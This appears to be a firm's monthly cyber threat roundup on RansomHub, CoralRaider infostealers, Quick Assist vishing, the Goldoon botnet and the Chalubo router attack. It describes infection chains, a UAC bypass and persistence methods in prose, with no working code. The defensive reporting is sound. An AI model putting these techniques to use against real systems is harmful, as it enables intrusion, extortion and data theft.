The overall level of cyber threat continues to be elevated globally and the impact is being felt across organizations of all sizes and industry sectors. Cyber-attacks persist across all industrial sectors with continued global focus on healthcare and industrial control systems (ICS). This follows the current trend where attackers are looking for 'soft' targets in industries with a history of underinvestment in cybersecurity. The impact of each attack is increasing as malicious actors focus on higher value targets.
The current unrest in the Middle East is creating a surge in attacks centered on or originating from that region. A recent malware campaign targeting Discord users through emoji's used on the platform. Disgomojj is a Discord-c2 program written in Golang that creates persistent access on the target system. Once present the malware is controlled through emojis in Discord. This then supports a variety of activities from screenshots to data exfiltration.
Below are the top five threats that have emerged over the past month.
Knight Ransomware Rebranded
RansomHub, a ransomware-as-a-service operation has been indicated in multiple attacks targeting major organizations in a range of industries including Change Healthcare, adding to the already growing cyber-threat offensive aimed at healthcare institutions. Recent analysis revealed that this is likely a rebranding of "Knight" ransomware (formerly Cyclops) which was shut down in late February of this year. This type of rapid repositioning and reopening of operations shortly after being exposed and taken down has become increasingly common as malware families move to more cloud-based, easily replicable models.
- The parallels between RansomHub and Knight are almost too numerous to deny a common owner
- Both are written in Go and obfuscated with Gobfuscate
- Identical help menus in command-line (although RansomHub includes a "sleep" option)
- Identical ransom notes
- Same function of restarting a host in safe mode before beginning encryption
The ransomware family was responsible for at least 26 attacks in April alone and shows no signs of slowing down as its operators appear to be putting out calls to recruit additional groups that were recently shutdown like LockBit and BlackCat. This appears to have been successful as at least one affiliate from BlackCat is known to have migrated and their tools subsequently seen in Ransomhub attacks. Based on the efficiency with which this operation was spun up and established prevalence, researchers speculate that these must be experienced, well-connected cybercriminals.
Ransomware activity in general was up for the year of 2023, following a dip in 2022. Seeing trends such as this quick pivoting/rebranding following disablement and the increased collaboration between threat groups suggests that this type of malware will only continue to proliferate through 2024. The majority of attacks occur outside of work hours with deployment typically within 48 hours of initial access. This highlights the importance of proactive, 24/7 cybersecurity measures, especially in the increasingly targeted healthcare industry where a successful ransomware attack can lead to physical harm and loss of lives.
APT CoralRaider
Cisco Talos uncovered an ongoing cyber campaign by threat actor CoralRaider, active since at least February 2024. This campaign involves distributing three well-known infostealer malware—Cryptbot, LummaC2, and Rhadamanthys. The actor employs various tactics to evade detection, including embedding PowerShell commands in LNK files to bypass antivirus software and using Content Delivery Network (CDN) cache domains as download servers for malicious payloads.
Victims from multiple countries, such as the U.S., Nigeria, Pakistan, and others, have been affected. The campaign targets victims through phishing emails containing malicious links. Once initiated, the infection chain involves opening a malicious Windows shortcut file that executes a series of PowerShell scripts to download and run the payload, ultimately installing one of the information-stealing malware variants.
The PowerShell scripts used by the threat actor are custom-made and not publicly documented, indicating a high level of sophistication. The attacker employs advanced techniques like using FoDHelper.exe to bypass User Access Controls (UAC) and modifying registry settings to execute malicious commands without user prompts.
Each malware variant—Cryptbot, LummaC2, and Rhadamanthys—has distinct features and capabilities aimed at stealing sensitive information from infected machines, including system data, browser information, credentials, and cryptocurrency wallets. These variants are continually evolving to avoid detection, with techniques such as obfuscation and payload encryption.
The threat actor utilizes multiple command-and-control (C2) domains and custom loaders to deploy and manage the malware, showing a deliberate effort to maintain persistence and evade security measures. The campaign's scale and sophistication suggest a well-organized cybercriminal operation targeting a wide range of organizations and individuals globally.
Quick Assist Social Engineering for Ransomware Deployment
Since mid-Apr '24, the client management tool Quick Assist has been seeing abuse by threat actor Storm-1811 for social engineering attacks against users. The group's primary deployed malware is Black Basta, profiled in a previous article. A frightening development in this campaign is the use of voice phishing, or "vishing," with RMM tools like ScreenConnect and NetSupport Manager (both intended for benevolent purposes), or malware like Qakbot, Cobalt Strike, and Black Basta.
Quick Assist allows users to share their device with someone over a remote connection to include full mouse/keyboard control. While this is often used for IT support purposes, it is frequently abused as is the case here. One example is attempting to impersonate IT or help desk personnel to conduct various generic fixes on a device. This can be in the wake of signing the user's email up for multiple mailing lists, and then calling to claim to alleviate the spam. The attacker simply convinces the user to grant them access through Quick Assist, done with CTRL+Windows+Q and entering the security code given by the actor.
Once the victim allows control, a scripted cURL command downloads a series of .bat and zip files that contain the payloads. Some scripts claim to be installing spam filters that then ask the user to enter sign-in credentials. This often leads to the downloading of Qakbot, Cobalt Strike, and ScreenConnect/NetSupport Manager for added persistence.
Qakbot and Cobalt Strike as covered previously have been long used as a beachhead on machines to facilitate further malware delivery/access. Black Basta, the primary payload, is an exclusive ransomware offering whose perpetrators often rent the aforementioned initial access from other threat actors.
Once again, the end-user is the easiest and most critical defense to bypass. Given the rise of AI tools for voice generation and their increasing effectiveness, this is a growing accessible front for attackers of all sizes and capabilities. As public awareness of this method of attack will likely lag behind the sophistication of these voice spoofing methods, this is a serious concern in the social engineering front that remains arguably the most important in Cybersecurity.
Proper training is more critical than ever, not only regarding phishing emails, but also for increasingly innovative techniques that continue to hide once easy-to-identify red flags. Blocking or uninstalling quick assist is an easy way to mitigate at least this vector, assuming that your organization uses another software to fulfill the remote IT support purpose.
Goldoon Botnet Targets 10 Year Old Vulnerability
In April 2024, FortiGuard Labs identified a new botnet named "Goldoon," which exploits an old D-Link vulnerability known as CVE-2015-2051. This vulnerability allows remote attackers to run arbitrary commands on affected devices using a crafted HTTP request. This discovery of Goldoon's activities is extremely significant, as it targets a vulnerability first found in 2015. Despite the age of the vulnerability, there are still plenty of unpatched systems out there, which means this bot can still run rampant through an environment.
The transmission of Goldoon begins with the exploitation of CVE-2015-2051 to download a dropper file from a particular URL. This dropper then proceeds to download and execute a suite of malicious files tailored for different Linux architectures including aarch64, arm, i686, and mips64, and others. The dropper eliminates any traces of its presence by deleting itself after execution, showcasing a level of discreetness designed to evade detection from even the strongest antivirus software.
Goldoon's payloads exhibit various behaviors, including initializing arguments necessary for attacks, setting autorun methods for persistence, establishing a persistent connection to a Command and Control (C2) server, and waiting for commands to initiate attacks, particularly distributed denial-of-service (DDoS) attacks. The malware also uses traffic encryption and reliable DNS resolvers, such as Google's, to successfully carry out its malicious objectives.
The autorun methods of Goldoon are diverse and aimed at ensuring that the malware is executed upon system startup or user login. These methods include modifying Linux boot initialization files or setting up as a daemon.
FortiGuard Labs' analysis revealed Goldoon's capability for an extensive range of attack methods – 27 in total – with actions like a TCP SYN flooding attack, for example. The botnet is still under development, indicating that the creators intend to expand on the already large arsenal of attack techniques.
Despite the age of CVE-2015-2051, the resurgence of its exploitation by Goldoon in 2024 underlines the ever-present risk posed by botnets. It also emphasizes the critical need for the implementation of consistent security patches to mitigate such threats. FortiGuard Labs' insight into Goldoon is a stern reminder of the evolution of botnets, and their exploitation of vulnerabilities to compromise devices and launch further attacks. These findings underscore the importance of staying vigilant and maintaining up-to-date security measures to protect against such persistent and adaptive cyber threats.
Large-Scale SOHO Router Attack
In late October 2023, a significant cyber incident was uncovered involving over 600,000 small office/home office (SOHO) routers connected to a single internet service provider (ISP). The attack, spanning from October 25 to October 27, rendered these devices permanently inoperable, necessitating hardware replacements. Public scan data corroborated this, showing a dramatic 49% reduction in the ISP's device count during this period.
The primary culprit behind this destructive event was identified to be the "Chalubo" remote access trojan (RAT). Initially detected in 2018, Chalubo is known for its ability to evade detection by removing files from disk and running in-memory, encrypting all communications with its command and control server. Despite being a common malware, Chalubo's sophisticated methods have contributed to its low visibility in security reports. The malware has various functionalities, including launching DDoS attacks and executing Lua scripts, which were likely used to deploy the destructive payload in this attack.
Technically, the attack began with Chalubo exploiting vulnerabilities or weak credentials in SOHO routers. Once initial access was gained, the malware retrieved and executed a series of bash scripts from a first-stage payload server. These scripts facilitated the download and execution of the Chalubo trojan, which then used ChaCha20 encryption to secure its communications with command and control servers. The malware deleted itself from the disk after execution, renamed its processes to avoid detection, and adjusted system settings to prevent termination due to memory constraints. The malware's ability to execute arbitrary Lua scripts allowed it to receive and run further commands from the attackers, including the destructive payload that rendered the routers inoperable.
Many affected areas were rural or underserved communities, leading to disruptions in emergency services, agricultural monitoring, and healthcare access. This incident highlights the vulnerability of essential services to cyber threats and the significant recovery challenges faced by isolated or vulnerable communities.
An investigation into the attack revealed that the Chalubo malware family was highly active in late 2023 and early 2024. The global telemetry data showed over 330,000 unique IP addresses communicating with Chalubo's command and control servers, indicating widespread infections. This attack stands out not only for its scale but also for the strategic use of malware to obscure the identity of the attackers, who remain unattributed. The findings underscore the need for robust cybersecurity measures and collaboration within the security community to mitigate such threats.
The global cyber threat level has continued to increase as a function of general global political unrest around the Middle East, Ukraine and China-Taiwan. The number of cybersecurity incidents continues to rise and their impact continues to increase. Organizations of all sizes and in all sectors need to increase their awareness of both the overall threat environment and threats specifically relevant to their organization or industry. Threat hunting, offered as part of Marcum Technology's Managed Security Services, can help provide this visibility in identifying potential risks to an organization.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.